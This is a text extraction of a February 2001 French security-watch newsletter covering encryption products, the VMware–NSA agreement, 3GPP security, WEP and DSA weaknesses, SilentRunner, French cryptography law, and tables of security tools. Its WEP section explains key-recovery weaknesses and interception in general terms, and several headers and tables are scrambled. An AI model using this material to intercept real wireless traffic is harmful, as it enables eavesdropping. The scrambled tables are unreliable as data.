Veille Technologique Sécurité
Transcription
Veille Technologique Sécurité
APOGEE Communications R dee orrtt d po pp Raap Veille Technologique Sécurité N 1 31 N°°3 Février 2001 Les informations fournies dans ce document ont été collectées et compilées à partir de sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites Web, ... Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains thèmes sont validées à la date de la rédaction du document. Les symboles d’avertissement suivants seront éventuellement utilisés: Site dont la consultation est susceptible de générer directement ou indirectement, une attaque sur l’équipement de consultation, voire de faire encourir un risque sur le système d’information associé. Site susceptible d’héberger des informations ou des programmes dont l’utilisation est répréhensible au titre de la Loi Française. Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la qualité des applets et autres ressources présentées au navigateur WEB. LLaa ddiiffffuussiioonn ddee ccee ddooccuum meenntt eesstt rreessttrreeiinnttee aauuxx cclliieennttss ddeess sseerrvviicceess V VTTS S--R RA APPPPO OR RTT eett V VTTS S__EEN NTTR REEPPR RIIS SEE Les marques et les produits cités dans ce bulletin sont la propriété des dépositaires respectifs. APOGEE Communications 1, Rue Jean Rostand 91893 ORSAY CEDEX Pour tous renseignements Offre de veille: http://www.apogee-com.fr/veille Informations: [email protected] © APOGEE Communications - Tous droits réservés Février 2001 Au sommaire de ce rapport … PRODUITS ET TECHNOLOGIES LES PRODUITS 5 5 CONTRÔLE D'ACCÈS 5 BLACKWHOLE 2.1 5 CHIFFREMENT 6 CODEDDRAG 2.3 ADAPTATEUR LAN CHIFFRANT CHEZ INTEL LES TECHNOLOGIES 6 6 7 SYSTÈMES RENFORCÉS 7 ACCORD ENTRE VMWARE ET LA NSA 7 GSM 7 SÉCURITÉ DE LA TROISÈME GÉNÉRATION 7 INFORMATIONS ET LÉGISLATION LES INFORMATIONS 9 9 CHIFFREMENT 9 FAIBLESSES DANS LE PROTOCOLE WEP DSA MIS À MAL 9 9 FORENSIC 10 SILENTRUNNER LA LÉGISLATION 10 11 SOCIÉTÉ DE L'INFORMATION 11 LOI SOCIÉTÉ DE L'INFORMATION 11 LOGICIELS LIBRES LES SERVICES DE BASE LES OUTILS 12 12 12 NORMES ET STANDARDS LES PUBLICATIONS DE L'IETF 14 14 LES LES RFC DRAFTS 14 14 NOS COMMENTAIRES 19 LES RFC 19 RFC 3029 19 LES DRAFTS DRAFT-MANNING-DSUA-06 19 DRAFT-LEWIS-STATE-OF-DNSSEC-00 DRAFT-GRIFFIN-SSH-HOST-KEYS-IN-DNS-00 ALERTES ET ATTAQUES ALERTES 19 20 21 22 22 GUIDE DE LECTURE FORMAT DE LA PRÉSENTATION 22 23 SYNTHÈSE MENSUELLE ALERTES DÉTAILLÉES 23 24 AVIS OFFICIELS 24 EDITEUR SOURCE BORDERWARE CERT COMPAQ CISCO FREEBSD HP LINUX LINUX DEBIAN LINUX MANDRAKE LINUX REDHAT LINUX SUSE MICROSOFT NETBSD Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 23 23 24 24 24 24 24 24 25 25 25 26 26 26 27 Page 2/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 OPENSSH OPENBSD SCRIPT PHP SSH1 SUN TURBOLINUX VIRUS WATCHGUARD WINGATE 27 27 27 27 27 28 28 28 28 ALERTES NON CONFIRMÉES 28 AOL AT&T BORDERWARE FORE/MARCONI GOAHEAD IBM LOTUS IBM MICROSOFT NOVELL PGP4PINE QNX SUN SUN STAROFFICE SYMANTEC 28 28 28 29 29 29 29 29 29 29 29 30 30 30 AUTRES INFORMATIONS 30 REPRISES D'AVIS 30 ET CORRECTIFS CIAC FREEBSD HP IBM ISS LINUX LINUX DEBIAN LINUX MANDRAKE LINUX REDHAT NETBSD ORACLE TIS/NAI VANDYKE 30 31 31 31 31 31 32 32 32 32 32 32 33 CODES D'EXPLOITATION 33 BULLETINS ET NOTES 33 BIND CISCO FREEBSD SSH 33 33 33 33 AXENT/SYMANTEC CERT CIAC EEYE MANDRAKESOFT LINUX REDHAT 33 33 33 34 34 34 ATTAQUES 34 OUTILS 34 HACKERWATCH.ORG TRIANGLE BOY SITE VULNERABILITIES.ORG CRACKWHORE 2.2 34 34 35 36 TECHNIQUES 36 ATTAQUE INDIRECTE DU SITE NAI IDENTIFICATION DES SERVICES LA LISTE NON OFFICIELLE DES NUMÉROS DE PORT TC/UDP Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés 36 39 40 Page 3/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Le mot de la rédaction … Coïncidence étonnante mais fortuite, la NSA et la CIA sont à 'la une' de ce rapport de Veille Technologique: le jour même de la diffusion d'une annonce commerciale concernant un logiciel de sécurité par la société Raytheon, la NSA récompense deux de ses employés pour la création de ce même logiciel, cette même agence annonce un accord avec VMWare pour le développement d'un système de sécurité quand on apprend qu'elle a par ailleurs travaillé sur l'algorithme de signature DSA objet d'une attaque académique, l'histoire se répète avec la CIA dont on découvre qu'elle sponsorise le développement d'un outil de navigation anonyme le jour de l'annonce de la prochaine disponibilité de celui-ci par la société SafeWeb. Soyons honnêtes, l'intérêt de ces deux agences pour les nouvelles technologies de l'information et les 'jeunes pousses' n'est pas nouveau. Il fait même l'objet de communiqués on ne peut plus officiels depuis l'année dernière … L'équipe de Veille Technologique Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 4/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 PR RO OD DU UIIT TS SE ET T TE EC CH HN NO OL LO OG GIIE ES S LES PRODUITS CONTROLE D'ACCES BLACKWHOLE 2.1 Description 'BlackWhole' de la société anglaise 'Carraig' est un logiciel destiné à sécuriser les environnements Windows™ 95/98/ME et à renforcer les mécanismes de sécurité déjà présents sous Windows NT et 2000. Ce produit assure deux fonctions complémentaires: 1. Un contrôle d'accès au système via une fenêtre de login paramétrable (logo de la société, zones de texte libre pouvant contenir une bannière d'avertissement). Cette fenêtre vient en complément de la fenêtre originale, toujours présentée mais automatiquement renseignée avec le mot de passe que l'utilisateur aura saisi lors de la première connexion. Le mécanisme de sécurité initial reste ainsi actif. 2. Un chiffrement transparent des volumes et/ou fichiers spécifiés lors de la phase de configuration du produit. L'algorithme 3DES est utilisé. Lors de la phase de chiffrement, les fichiers originaux sont effacés, les secteurs de données étant remplis de valeurs aléatoires pour limiter tout risque de récupération par une analyse de bas niveau. Le point le plus remarquable réside dans le fait que le produit est totalement transparent pour l'utilisateur, voire invisible si l'option d'utiliser un écran de login identique à celui du système d'exploitation a été sélectionnée. Un code de 16 caractères dit 'PUC' (Product Unlock Code) est généré - ou sélectionné - par l'utilisateur lors de l'installation. Ce code est utilisé en dernier recours pour déverrouiller l'accès au système. Il est à noter que tous les systèmes partageant ce code pourront partager en réseaux les fichiers chiffrés. Une méthode de déploiement (MDS ou Mass Deploiement System) est proposée qui permet de générer un kit d'installation d'un volume inférieur au méga-octet et protégé par chiffrement. Ce kit contiendra la liste des utilisateurs habilités à utiliser les systèmes sur lesquels il sera installé. Un produit complémentaire dénommé 'Remote Recovery Manager' peut être utilisé pour générer un code de déverrouillage en cas de perte de la clef d'accès (PUC). La procédure mise en œuvre autorise le déverrouillage du poste sans que l'administrateur ait à dévoiler le PUC à l'utilisateur: L'utilisateur donne le nom de son compte ainsi qu'un challenge affiché sur le poste. Le nom de compte permet de retrouver le PUC stocké dans la base de donnée lors de l'installation. Le challenge et le PUC sont ensuite combinés pour former la clef de déverrouillage transmise à l'utilisateur. La société Carraig propose par ailleurs le produit 'Latches' destiné à pallier l'absence d'un mécanisme de contrôle d'accès dans les environnements Windows™ 95 et 98. Notons que la durée de vie d'un tel produit est directement liée à celle des systèmes cibles Windows™ 95 et 98. Complément d’information http://www.carraig.co.uk/ Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 5/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 CHIFFREMENT CODEDDRAG 2.3 Description La version 2.3 du produit de chiffrement de fichiers 'CodedDrag' est disponible. Ce produit, développé et vendu 30$ par l'université Johannes Kepler de Linz (Autriche), fonctionne en environnement Windows 9x, 2000 et NT 4. Remarquablement conçu tant sur le plan des performances que de l'ergonomie d'utilisation, ce produit utilise le mécanisme du 'Drag and Drop' pour activer le chiffrement. Une icône dédiée est créée sur le Bureau lors de l'installation. Le chiffrement d'un quelconque fichier est effectué par simple 'Déplacer/Relacher' du fichier (ou du répertoire) sur l'icône. Un double click sur le nom du fichier chiffré active immédiatement son déchiffrement. Les options de configuration sont paramétrables par le biais d'une application activée depuis la barre de contrôle. L'utilisateur peut ainsi sélectionner: - L'algorithme de chiffrement utilisé parmi les trois algorithmes TripleDES, DES et BlowFish, - L'utilisation d'une fonction de compression permettant de réduire notablement la taille du fichier résultant, - L'application d'une fonction de brouillage destinée à masquer le nom original du fichier, - La mémorisation des clefs utilisées - mémorisation de la clef de chiffrement ou de chiffrement/déchiffrement - ainsi que la durée de vie de cette mémorisation, - La destruction du fichier de pagination lors de l'arrêt du système. On ne peut que regretter l'absence d'une fonction permettant d'associer le processus de (dé)chiffrement à une liste d'applications comme cela est proposé par le produit 'SecurityBox' de la société Française MSI SA. Une copie d'écran du contenu d'un répertoire avant et après chiffrement est présentée ci-après. Le mécanisme de compression est inefficace sur le fichier contenant une image, celle-ci étant stockée dans un format déjà compressé. Non chiffre Chiffré Complément d'information http://www.fim.uni-linz.ac.at/codeddrag/codedrag.htm ADAPTATEUR LAN CHIFFRANT CHEZ INTEL Description La société INTEL propose plusieurs versions sécurisées de sa gamme de cartes réseaux Intel PRO. Référencées 'Intel PRO/100S' Desktop Adapter' (format PCI), 'Intel PRO/100S' Server Adapter' (format PCI disposant de fonctions de tolérance aux pannes) et 'Intel PRO/100SR' Mobile Adapter' (format PCMCIA intégrant un modem V90), ces cartes utilisent un nouveau composant - l'Intel 8255x - et un co-processeur spécialisé - l'Intel 82594ED - assurant un chiffrement DES à haute performance. Particulièrement adaptée à l'environnement Windows™ 2000, cette famille de cartes embarque une pile protocolaire IPSEC jouant ainsi le rôle d'un accélérateur cryptographique. Les environnements Windows™ 98 et NT pourront bénéficier de cette fonctionnalité sous réserve d'installer un gestionnaire de périphérique spécifique dénommé 'Intel Packet Protect'. La pile embarquée supporte les algorithmes et méthodes IPSEC suivantes: Chiffrement: DES/3DES Authentification: SHA-1/MD5 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 6/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 Gestion de clef: Preshared Key/EntrustPKI Compatible avec les adaptateurs de la famille Intel PRO/100 classique, ces cartes peuvent être installées sans modification dans un système existant, les fonctionnalités de sécurité étant alors désactivées. Ces cartes utilisant un moyen cryptologique sont soumises aux règles applicables en la matière dans les pays fournisseurs (USA) et utilisateurs (FR). En pratique, si l'utilisation de l'algorithme DES ne doit plus poser de problème, l'intégration du 3DES (168bits) dans un processeur performant pourrait restreindre l'utilisation de ces produits. Le site INTEL France ne fourni aucun détail, le site Américain annonce que l'exportation est susceptible d'être restreinte. A noter également, l'apparition de cartes mères intégrant nativement cette gamme de cartes réseaux et le processeur cryptographique associé ! Complément d'information http://www.intel.com/network/products/adapters_landing.htm http://www.intel.fr/francais/network/solutions/security.htm http://www.yoku.com.sg/d1192_mb.htm LES TECHNOLOGIES SYSTEMES RENFORCES ACCORD ENTRE VMWARE ET LA NSA Description La société Américaine 'VMWARE' est bien connue pour ses logiciels d'émulation permettant de faire fonctionner un système d'exploitation - LINUX par exemple - en tant que tâche d'un autre système d'exploitation. Cette technologie pourrait être mise à profit pour fournir un environnement fortement sécurisé si l'on se réfère à l'annonce d'un effort de coopération entre un équipe de la NSA et VMWARE. L'objectif serait de fournir un système susceptible de faire fonctionner n'importe quelle application du commerce dans un environnement minimaliste assurant un fort niveau d'isolation entre le système et les autres applications. Ce cloisonnement logiciel permet de limiter les risques de propagation en cas de contamination de l'un des compartiments. Cette technologie n'est pas sans rappeler celle utilisée dans certains systèmes d'exploitation existant ou ayant existé, dont l'un des ancêtres d'UNIX, MULTICS, et le système HP Virtual Vault. La nouveauté, s'il doit y en avoir une, réside dans la 'caution' apportée par l'officialisation d'un accord de coopération avec l'un des services les plus controversé du monde. Complément d’information http://www.vmware.com/news/releases/nsa_pr.html GSM SECURITE DE LA TROISEME GENERATION Description L'initiative 3GPP (ou Third Generation PartnerShip Project) qui regroupe les principaux acteurs dans le domaine de la technologie GSM (Global System for Mobile) a pour objectif de gérer l'évolution concertée des spécifications du système GSM dont les services étendus GPRS (General Packet Radio Service) et EDGE (Enhanced Data rates for GSM Evolution). Conscient de l'importance de la sécurité dans ces architectures, et plus largement de la réactivité de la communauté mondiale face aux nouvelles technologies, le consortium 3GPP a depuis l'origine choisi de rendre publics les résultats de ses travaux. La série '33' traite ainsi l'ensemble de la problématique de la sécurité par le biais des 17 documents techniques suivants: 33.102 Security Architecture (1999) 33.103 Security Integration Guidelines (1999) 33.105 Cryptographic Algorithm requirements (1999) 33.106 Lawful interception requirements (1999) 33.107 Lawful interception architecture and functions (1999) 33.120 Security Objectives and Principles (1999) 33.133 Security threats and requirements (1999) 33.20 Security principles for the UMTS 33.200 Network Domain Security Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 7/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 33.21 UMTS Security Requirements 33.800 Principles for Network Domain Security 33.900 Guide to 3G security (Nov. 2000) 33.901 Criteria for cryptographic Algorithm design process (1999) 33.902 Formal Analysis of the 3G Authentication Protocol (1999) 33.903 Access Security for IP based services 33.904 Report on the Evaluation of 3GPP Standard Confidentiality and Integrity Algorithms 33.908 General report on the design, specification & evaluation of 3GPP std confidentiality & integrity algorithms 33.909 Report on the evaluation of 3GPP standard confidentiality and integrity algorithms Le rapport technique 33.900 'Guide to 3G security' est particulièrement intéressant à lire car offrant une vision précise et synthétique des différentes menaces, et des parades associées, prises en compte lors de la conception des évolutions du système GSM dont principalement: Le déni de service Le vol d'identité L'usurpation du réseau L'écoute des données L'usurpation d'identité Une rapide lecture des rapports techniques traitant des interfaces d'interception - 33.106 et 33.107 - permettra de se faire une bonne opinion des capacités d'interception du système. Les structures de données associés aux événements générés sur les trois niveaux d'interfaces (X1, X2 et X3) y sont en effet largement détaillées. Notons à ce sujet, qu'un draft ETSI (Réf. EG 201 781)concernant les interfaces d'interception dans le réseau intelligent (IN) est disponible sur le site de ZDNET. Complément d'information ftp://ftp.3gpp.org/Specs/Latest_drafts/33_series/33900-120.zip http://www.3gpp.org/ http://www.zdnet.fr/actu/etsi.pdf Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 8/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 IN NF FO OR RM MA AT TIIO ON NS SE ET T LE EG GIIS SL LA AT TIIO ON N LES INFORMATIONS CHIFFREMENT FAIBLESSES DANS LE PROTOCOLE WEP Description Des chercheurs de l'université de Berkeley ont publié un rapport de recherche concernant la qualité cryptographique du protocole WEP (Wired Equivalent Privacy) intégré à la norme de transmission de donnée sans fil IEE802.11. Les résultats de cette étude ne vont pas dans le sens attendu puisqu'ils mettent en évidence plusieurs faiblesses autorisant aussi bien les attaques passives (sans intervention dans l'échange) que les attaques actives (un tiers s'immisce dans l'échange). Il apparaît ainsi qu'aucune des 3 propriétés fondamentales d'un protocole de sécurité - la confidentialité, le contrôle d'accès, l'intégrité de données - n'est garantie par le protocole WEP. La solidité de ce protocole à clef secrète ne repose que sur la seule difficulté à recouvrir la clef utilisée, la longueur de celle-ci étant couramment limitée à 40bits. Tout défaut de conception ou d'implémentation permettant de réduire l'espace de recherche de cette clef conduira inéluctablement à affaiblir le niveau de sécurité. Concrètement, WEP utilise l'algorithme de chiffrement RC4, algorithme de type 'stream cipher' générant une suite d'octets chiffrants et nécessitant un vecteur V d'initialisation (ou IV - Initialisation Value) de 24bits. La clef K étant constante, la suite des valeurs d'initialisation ne doit être ni prédictible ni trop fortement récurrente. Si tel n'est pas le cas, la clef peut être assez facilement recouvrée, la valeur d'initialisation utilisée étant nécessairement transmise en clair. Figure extraite du rapport de recherche Deux problèmes ont principalement été mis en évidence par les auteurs de l'étude: 1. La norme IEEE802.11 n'impose aucune contrainte sur la génération des valeurs d'initialisation et se contente de recommander le changement de cette valeur pour chaque message transmis. Les auteurs ont ainsi découvert qu'un coupleur PCMCIA - le fournisseur n'est pas cité - utilise comme valeur d'initialisation, le compteur du nombre de message transmis, soit une périodicité de 2^24. 2. La taille de la valeur d'initialisation est insuffisante face à la capacité de trafic offerte en IEEE802.11. En considérant un point d'accès travaillant à 5Mbs de débit utile et une longueur moyenne de 1500 octets, l'espace des valeurs d'initialisation est parcouru en moins d'une demi-journée. La probabilité de trouver deux messages chiffrés avec la même valeur d'initialisation et ayant une entête similaire est forte. La mise en cause de la qualité de la spécification et de l'implémentation du protocole jette un sérieux doute sur la sécurité de l'ensemble de la famille des protocoles dits 'Sans Fils'. Rappelons qu'une étude similaire portant sur la sécurité du protocole BlueTooth, publiée par l'université d'Helsinki en Mai dernier, concluait, elle aussi, à l'existence de faiblesses exploitables. Sur un marché en pleine expansion, l'argument de la difficulté d'accès aux technologies permettant l'interception, voire la manipulation, des données transmises ne tient pas. Les fréquences utilisées par la norme IEEE 802.11 2.4GHz - sont aussi allouées, et utilisées, par une kyrielle de dispositifs grand public libres d'accès. Il est ainsi désormais possible de disposer d'un tuner 2.4Ghz programmable et d'une antenne patch ad'hoc pour moins de 90Є (500FF). Le décodage numérique des trames peut être obtenu par réutilisation de la chaîne de décodage d'une carte IEEE. Par ailleurs, et comme mentionné dans le rapport de recherche, certains coupleurs IEEE 802.11 offrent une interface programmatique permettant d'accéder au niveau trame du protocole. Le reste n'est plus qu'une affaire de programmation et de temps, du moins lorsque la solidité de la chaîne cryptographique est insuffisante. Complément d’information http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html http://www.niksula.cs.hut.fi/~jiitv/bluesec.html DSA MIS A MAL Description Un communiqué de presse publié par les Bell-Labs (centre de recherche de LUCENT) fait état d'une particularité 'inexpliquée' dans la conception du générateur d'aléa utilisé par l'algorithme DSA (Digital Standard Algorithm). Cet Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 9/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 algorithme normalisé sous la référence ANSI X9.30 fait partie intégrante du mécanisme de signature DSS (Digital Signature Scheme), objet du standard FIPS 186-2. L'auteur de cette découverte, D.Bleichenbacher, est un cryptanalyste connu pour avoir mis en évidence en 1998 la faiblesse du standard 'PKCS#1 RSA encryption standard' face à une attaque de type 'chiffré choisi'. Notons à ce propos que cette technique avait été utilisée avec succès pour attaquer le protocole SSH V1.5 ! Dans le cas de l'algorithme DSA, la particularité réside dans une distribution '(a)normale' des valeurs pseudoaléatoires fournies par le générateur spécifié par le standard X9.30. Certaines plages de valeurs ont en effet deux fois plus de chance d'être tirées que d'autres plages! Dès lors, le caractère 'aléatoire' n'étant plus respecté, la solidité de l'algorithme, et par conséquence la qualité de la signature, ne peut plus être garantie. A ce jour, cette faille reste inexploitable car nécessitant une énorme puissance de calcul. Plusieurs palliatifs ont déjà été proposés et analysés lors de la dernière réunion du comité ANSI X9F1. Il est à noter que l'algorithme ECDSA (Elliptic Curve Digital Standard Algorithm) spécifié par la norme ANSI X9.62 n'est pas concerné par ce problème. Complément d’information Http://www.bell-labs.com/press/0201/010205.bla.html FORENSIC SILENTRUNNER Description La société Américaine Raytheon a annoncé que son produit d'analyse et de corrélation 'SilentRunner' avait été sélectionné par la firme True Security Corp. - précédemment connue sous l'appellation 'ICSA.net' - pour être intégré à son offre de service. Coïncidence fortuite, la NSA a publié à la même période un document officiel annonçant le versement d'une récompense à deux de ses employés (le Curriculum Vitae de l'un d'entre eux est disponible sur Internet …) pour la création du prototype de l'outil SilentRunner dont le développement et la commercialisation ont été assurés par Raytheon. Décrit comme étant un système passif d'analyse et de corrélation d'événement réseau - Discovery, Visualization and Analysis (DVA) system - 'SilentRunner' est annoncé être utilisé par les services gouvernementaux Américains mais aussi par les principales grandes firmes américaines des secteurs de la Défense, de la Finance, de l'Electronique et de la Pharmacie. Aucune version d'évaluation de ce système fonctionnant, semble-t-il, aussi bien en environnement NT qu'UNIX n'est hélas proposée. Les quelques informations contenues dans les fiches techniques disponibles sur le site dédié www.silentrunner.com et dans la brochure de présentation intitulée 'Information Rules. Protect Yours' disponible sur le site de Raytheon laissent cependant présager des fonctionnalités d'analyse et de corrélation impressionnante pour un prix annoncé de $65000: Passive operation Multiple remotes Field portable User-friendly interface Network data acquisition Real-time data views Playback data views Use of Boolean Expressions Vulnerability assessments Session reconstruction Scenario reconstruction Network traffic visualizations Graphical network views Network traffic analysis 2D and 3D visualizations De part sa conception, cet outil semble parfaitement adapté à la surveillance et au contrôle de la bonne utilisation des actifs gérés par le système d'information de l'Entreprise. 'SilentRunner' intègre notamment un mécanisme passif d'auto-découverte de la topologie et des ressources du réseau ainsi qu'un système de détection d'anormalité. La brochure de présentation intitulée 'Information Rules. Protect Yours' disponible sur le site de Raytheon contient quelques copies d'écran qui permettent de se faire une idée du modèle d'analyse 3D. Complément d'information http://www.silentrunner.com http://www.raytheon.com/c3i/c3iproducts/c3i021/c3i021.htm http://www.raytheonaircraftcharter.com/newsroom/briefs/silent_runner.html http://www.nsa.gov/releases/first_royalties_nsa_employees_02122001.html Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 10/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 LA LEGISLATION SOCIETE DE L'INFORMATION LOI SOCIETE DE L'INFORMATION Description La revue 'Tranfert' a mis en ligne sur son site une copie de l'avant projet de la loi 'société de l'information' (ou LSI) dont un des chapitres traite explicitement de la liberté d'utilisation de la cryptologie. Nous laisserons le lecteur juger par lui même de la teneur du texte en attirant l'attention sur l'emploi d'un nouveau terme: le 'transfert'. Si l'utilisation des moyens de cryptologie est annoncée libre (Art. 3.12-1), un contrôle est toujours exercé la fourniture, l'import, l'export et le transfert de certaines catégories de moyens. Une liste établira les moyens dispensés de toute formalité car n'interférant pas avec les 'intérêts de la défense nationale et de la sécurité intérieure ou extérieure de l'Etat'. Un dossier complet et fort intéressant car prenant en compte l'ensemble des thèmes abordés par la LSI est disponible sur le site de l'association 'Imaginons un Réseau Internet Solidaire' (IRIS). Le lecteur y trouvera un historique détaillé du projet de loi, le texte divulgué par 'Transfert' ainsi que la liste des textes de Loi susceptibles d'être modifiés par la LSI. Bien entendu, aucune garantie ne peut être apportée quant à l'exactitude et l'intégrité de la copie divulguée par 'Transfert', cette divulgation ayant pu être le résultat d'une action volontaire de test ou de désinformation. Complément d'information http://www.transfert.net/fr/dossiers/article.cfm?idx_rub=87&idx_art=3968 http://www.iris.sgdg.org/actions/lsi/ Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Page 11/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 LO OG GIIC CIIE EL LS S LIIB BR RE ES S LES SERVICES DE BASE Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme dédiée. RÉSEAU Nom BIND DHCP NTP4 WU-FTP Fonction Ver. Gestion de Nom (DNS) Serveur d'adresse Serveur de temps Serveur de fichiers 9.1.1rc2 3.0b2pl16 4.0.99k 2.6.1 Date Source 12/02/01 30/11/00 20/07/00 02/07/00 http://www.isc.org/products/BIND http://www.isc.org/products/DHCP http://www.eecis.udel.edu/~ntp http://www.wu-ftpd.org MESSAGERIE Nom Fonction Ver. Relevé courrier Relevé courrier Serveur de courrier 2000c 3.1 8.11.3 Nom Fonction Ver. APACHE Serveur WEB IMAP4 POP3 SENDMAIL Date Source 20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html 07/04/00 http://www.eudora.com/qpopper_general/ 27/02/01 http://www.sendmail.org WEB ModSSL SQUID 1.3.17 2.0a9 API SSL Apache 1.3.17 2.8.0 Cache WEB 2.3s4 Date Source 29/01/01 http://httpd.apache.org/dist 12/12/00 30/01/01 http://www.modssl.org/ 18/07/00 http://www.squid-cache.org AUTRE Nom INN MAJORDOMO OpenCA OpenLDAP LES Fonction Ver. Gestion Gestion Gestion Gestion 2.3.1 1.94.5 0.2.0-5 2.0.7 des news des listes de certificats de l'annuaire Date Source 11/01/01 15/01/00 26/01/01 06/11/00 http://www.isc.org/products/INN http://www.greatcircle.com/majordomo http://www.openca.org http://www.openldap.org OUTILS Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les tableaux suivants. LANGAGES Nom Fonction Ver. Perl PHP Scripting WEB Dynamique 5.6.0 4.0.4pl1 Date Source 23/03/00 http://www.cpan.org/src/index.html 11/01/01 http://www.php.net ANALYSE RÉSEAU Nom Big Brother Dsniff EtherEal IP Traf Nstreams SamSpade Fonction Ver. Visualisateur snmp Boite à outils Analyse multiprotocole Statistiques IP Générateur de règles Boite à outils 1.6e1 2.3 0.8.15 2.3.1 1.0.0 1.14 Date Source 29/01/01 17/12/00 11/01/01 13/11/00 11/11/00 10/12/99 http://maclawran.ca/bb-dnld/new-dnld.html http://www.monkey.org/~dugsong/dsniff http://www.ethereal.com http://cebu.mozcom.com/riker/iptraf/ http://www.hsc.fr/ressources/outils/nstreams/download/ http://www.samspade.org/ssw/ ANALYSE DE JOURNAUX Nom Analog Autobuse WebAlizer Fonction Ver. Journaux serveur http Analyse syslog Journaux serveur http 4.16 1.13 2.01-06 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Date Source 13/02/01 http://www.analog.cx 31/01/00 http://www.picante.com/~gtaylor/autobuse 17/10/00 http://www.mrunix.net/webalizer/ Page 12/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 ANALYSE DE SÉCURITÉ Fonction Ver. Nessus Nmap Nom Vulnérabilité réseau Vulnérabilité réseau Pandora Saint Sara Tara (tiger) Trinux Vulnérabilité Netware Vulnérabilité réseau Vulnérabilité réseau Vulnérabilité système Boite à outils 1.0.7a 2.53 2.54B7 4.0b2.1 3.1.5 3.3.4 2.0.9 0.8pre1 Date Source 30/01/00 05/09/00 17/09/00 12/02/99 13/02/01 26/01/01 07/09/99 22/10/00 http://www.nessus.org http://www.insecure.org/nmap http://www.packetfactory.net/projects/pandora/ http://www.wwdsi.com/saint http://www-arc.com/sara http://www-arc.com/tara http://www.io.com/~mdfranz/trinux/boot-images/ CONFIDENTIALITÉ Nom Fonction Ver. OpenPGP GPG Signature/Chiffrement Signature/Chiffrement 1.0.4p1 Date Source http://www.openpgp.org/ 30/11/00 http://www.gnupg.org CONTRÔLE D'ACCÈS Nom TCP Wrapper Xinetd Fonction Ver. Accès services TCP Inetd amélioré 7.6 2.1.89p14 Date Source ftp://ftp.cert.org/pub/tools/tcp_wrappers 18/01/01 http://www.xinetd.org CONTRÔLE D'INTÉGRITÉ Nom Fonction Ver. Tripwire Intégrité LINUX 2.3.47 Date Source 15/08/00 http://www.tripwire.org/downloads/index.php DÉTECTION D'INTRUSION Nom Fonction Deception TK Pot de miel Snort IDS Système Shadow IDS Réseau Ver. 19990818 1.7 1.6 Date Source 18/08/99 http://all.net/dtk/dtk.html 05/01/01 http://www.snort.org 01/07/00 http://www.nswc.navy.mil/ISSEC/CID/ GÉNÉRATEURS DE TEST Nom Fonction Ver. Analyse filtres Fragments IP Paquets IP Détection d'intrusion Sessions TCP Paquets UDP 1.0 1.6 2.1a 1.0 1.0.1 1.2 Nom Fonction Ver. DrawBridge IpFilter Sinus PareFeu FreeBsd Filtre datagramme PareFeu Linux 3.1 3.4.16 0.1.6 FireWalk FragRouter IPSend IDSWakeUp TcpReplay UdpProbe Date Source 03/02/01 21/09/97 19/09/97 13/10/00 19/05/97 13/02/96 http://www.packetfactory.net/firewalk http://www.anzen.com/research/nidsbench/ ftp://coombs.anu.edu.au/pub/net/misc http://www.hsc.fr/ressources/outils/idswakeup/download/ http://www.anzen.com/research/nidsbench/ http://sites.inka.de/sites/bigred/sw/udpprobe.txt PARE-FEUX Date Source 19/04/00 http://drawbridge.tamu.edu 15/01/01 http://coombs.anu.edu.au/ipfilter/ip-filter.html 01/09/00 http://www.ifi.unizh.ch/ikm/SINUS/firewall TUNNELS Fonction Ver. CIPE FreeSwan http-tunnel Nom Pile Crypto IP (CIPE) Pile IPSec Encapsulation http OpenSSL OpenSSH SSF Stunnel Zebedee Pile SSL Pile SSH 1 et 2 Pile SSH 1 autorisée Proxy https Tunnel TCP/UDP 1.5.1 1.8 3.0.5 3.2 (dev) 0.9.6 2.5.1 1.2.27.6 3.13 2.2.1 Veille Technologique Sécurité N°31 © APOGEE Communications - Tous droits réservés Date Source 11/02/01 04/12/00 06/12/00 31/08/00 24/09/00 19/02/01 16/09/99 25/01/01 09/02/01 http://sites.inka.de/sites/bigred/devel/cipe.html http://www.freeswan.org http://www.nocrew.org/software/httptunnel.html http://www.openssl.org/ http://www.openssh.com/ http://info.in2p3.fr/secur/ssf http://www.stunnel.org http://www.winton.org.uk/zebedee/ Page 13/42 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Février 2001 NO OR RM ME ES SE ET T ST TA AN ND DA AR RD DS S LES LES 